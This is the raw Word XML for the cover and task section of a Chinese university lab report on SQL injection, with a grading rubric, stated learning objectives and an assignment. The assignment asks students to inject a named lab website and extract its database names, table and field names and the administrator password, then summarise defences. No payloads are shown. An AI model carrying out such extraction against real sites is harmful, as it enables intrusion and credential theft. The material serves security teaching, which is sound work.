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900D1" w14:textId="7FBE2B1D" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00125B21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《</w:t>
      </w:r>
      <w:r w:rsidR="00F36285">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>网络空间安全概论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430392AA" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00F36285">
      <w:pPr>
        <w:ind w:right="880"/>
        <w:jc w:val="center"/>
      </w:pP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192"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="431"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="767"/>
        <w:gridCol w:w="2956"/>
      </w:tblGrid>
      <w:tr w:rsidR="00125B21" w:rsidRPr="00F778EE" w14:paraId="32F67C35" w14:textId="77777777" w:rsidTr="007F0509">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="590"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B1E593F" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00B71FAC" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B71FAC">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5652CFC1" w14:textId="389B01F1" w:rsidR="00125B21" w:rsidRPr="00F36285" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:iCs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1F90158" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00B71FAC" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B71FAC">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>年级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08B56BD5" w14:textId="69B78F42" w:rsidR="00125B21" w:rsidRPr="00F36285" w:rsidRDefault="00F36285" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F36285">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:iCs/>
              </w:rPr>
              <w:t>2021级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w:rsidRPr="00F778EE" w14:paraId="7D0B8CCE" w14:textId="77777777" w:rsidTr="007F0509">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="590"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3507CF14" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00B71FAC" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B71FAC">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="079FF33B" w14:textId="7EF5134E" w:rsidR="00125B21" w:rsidRPr="00F36285" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:iCs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E42E46B" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00B71FAC" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B71FAC">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>专业、班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0741A960" w14:textId="3F30FB37" w:rsidR="00125B21" w:rsidRPr="00F36285" w:rsidRDefault="00F36285" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F36285">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:iCs/>
              </w:rPr>
              <w:t>计算机科学与技术01班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="236AD37A" w14:textId="77777777" w:rsidTr="00A5242F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="590"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F25BF3C" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42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实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7117" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26263924" w14:textId="5B83D213" w:rsidR="00125B21" w:rsidRPr="00F36285" w:rsidRDefault="005208D0" w:rsidP="00807833">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51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5208D0">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:r w:rsidR="00580CC7">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>四</w:t>
            </w:r>
            <w:r w:rsidRPr="005208D0"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 </w:t>
            </w:r>
            <w:r w:rsidR="00580CC7" w:rsidRPr="00580CC7">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SQL注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="32432F13" w14:textId="77777777" w:rsidTr="00A5242F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="579"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="543FA80A" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00125B21" w:rsidP="00A5242F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 w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>实验时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="291E74BB" w14:textId="0674115B" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00F36285" w:rsidP="00F36285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024.</w:t>
            </w:r>
            <w:r w:rsidR="00580CC7">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>5.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1070EF65" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00125B21" w:rsidP="00A5242F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 w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>实验地点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="579CB7C7" w14:textId="500F06DA" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00F36285" w:rsidP="00A5242F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DS3304</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="6BB7DBA3" w14:textId="77777777" w:rsidTr="00A5242F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="505"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5671C750" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00B053FC" w:rsidRDefault="00125B21" w:rsidP="00A5242F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 w:rsidRPr="00B053FC">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>实验成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65F838FA" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00B053FC" w:rsidRDefault="00125B21" w:rsidP="00F36285">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="1051"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b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7EAEC4C1" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00125B21" w:rsidP="00125B21">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:leftChars="-20" w:left="-44" w:right="171"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>实验性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11BF1C93" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00826B6B" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="171"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>验证性</w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>设计性</w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00826B6B">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="3D1BCD0D" w14:textId="77777777" w:rsidTr="00E73574">
        <w:trPr>
          <w:trHeight w:val="3249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0771EAD0" w14:textId="77777777" w:rsidR="00125B21" w:rsidRPr="00BC287A" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC287A">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>教师评价：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3849E4EF" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK6"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK20"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK31"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK45"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK46"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK48"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK65"/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算法/实验过程正确；</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">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源程序/实验内容提交</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">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程序结构/实验步骤合理；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E08795" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pP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实验结果正确；</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     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语法、语义正确；</w:t>
            </w:r>
            <w:r w:rsidR="00D61110">
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    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报告规范；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BE220B" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>评语：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462CBB57" w14:textId="77777777" w:rsidR="00F6708E" w:rsidRPr="00F6708E" w:rsidRDefault="00125B21" w:rsidP="00F6708E">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51" w:firstLineChars="150" w:firstLine="330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</w:t>
            </w:r>
            <w:r w:rsidR="00E73574">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">                        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>评价教师签名（电子签名）：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r>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="6BA9192B" w14:textId="77777777" w:rsidTr="00D61110">
        <w:trPr>
          <w:trHeight w:val="1841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6E963A65" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51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一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7400FE3C" w14:textId="77777777" w:rsidR="00580CC7" w:rsidRPr="00580CC7" w:rsidRDefault="00580CC7" w:rsidP="00580CC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80CC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1. </w:t>
            </w:r>
            <w:r w:rsidRPr="00580CC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习并掌握</w:t>
            </w:r>
            <w:r w:rsidRPr="00580CC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QL</w:t>
            </w:r>
            <w:r w:rsidRPr="00580CC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注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBD4913" w14:textId="652647E5" w:rsidR="001B0DA1" w:rsidRPr="005208D0" w:rsidRDefault="00580CC7" w:rsidP="00580CC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80CC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2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00580CC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习</w:t>
            </w:r>
            <w:r w:rsidRPr="00580CC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QL</w:t>
            </w:r>
            <w:r w:rsidRPr="00580CC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注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="12B6167C" w14:textId="77777777" w:rsidTr="00C47A2E">
        <w:trPr>
          <w:trHeight w:val="1634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1377A76" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00A5242F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二、实验项目内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E891F17" w14:textId="77777777" w:rsidR="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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对以下网站进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55CDEC33" w14:textId="4DDAD0CD" w:rsidR="00FD0EAC" w:rsidRPr="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0EAC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EB3E1D" w14:textId="77777777" w:rsidR="00FD0EAC" w:rsidRPr="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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完成以下信息的获取：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76BAB35A" w14:textId="17B13D1D" w:rsidR="00FD0EAC" w:rsidRPr="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737F7535" w14:textId="058250BD" w:rsidR="00FD0EAC" w:rsidRPr="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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2.</w:t>
            </w:r>
            <w:bookmarkStart w:id="34" w:name="OLE_LINK2"/>
            <w:r w:rsidRPr="00FD0E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数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC079A5" w14:textId="736015E9" w:rsidR="00FD0EAC" w:rsidRPr="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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3.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2207B7D6" w14:textId="48356EC6" w:rsidR="00FD0EAC" w:rsidRPr="00FD0EAC" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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lastRenderedPageBreak/>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="34"/>
          <w:p w14:paraId="0DDDD80D" w14:textId="1D246130" w:rsidR="00643188" w:rsidRPr="00970130" w:rsidRDefault="00FD0EAC" w:rsidP="00FD0EAC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FD0E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最后总结</w:t>
            </w:r>
            <w:bookmarkStart w:id="35" w:name="OLE_LINK16"/>
            <w:r w:rsidRPr="00FD0E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如何对</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD0E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注入攻击进行防范</w:t>
            </w:r>
            <w:bookmarkEnd w:id="35"/>
            <w:r w:rsidRPr="00FD0E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。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00125B21" w14:paraId="2A589412" w14:textId="77777777" w:rsidTr="00A5242F">
        <w:trPr>
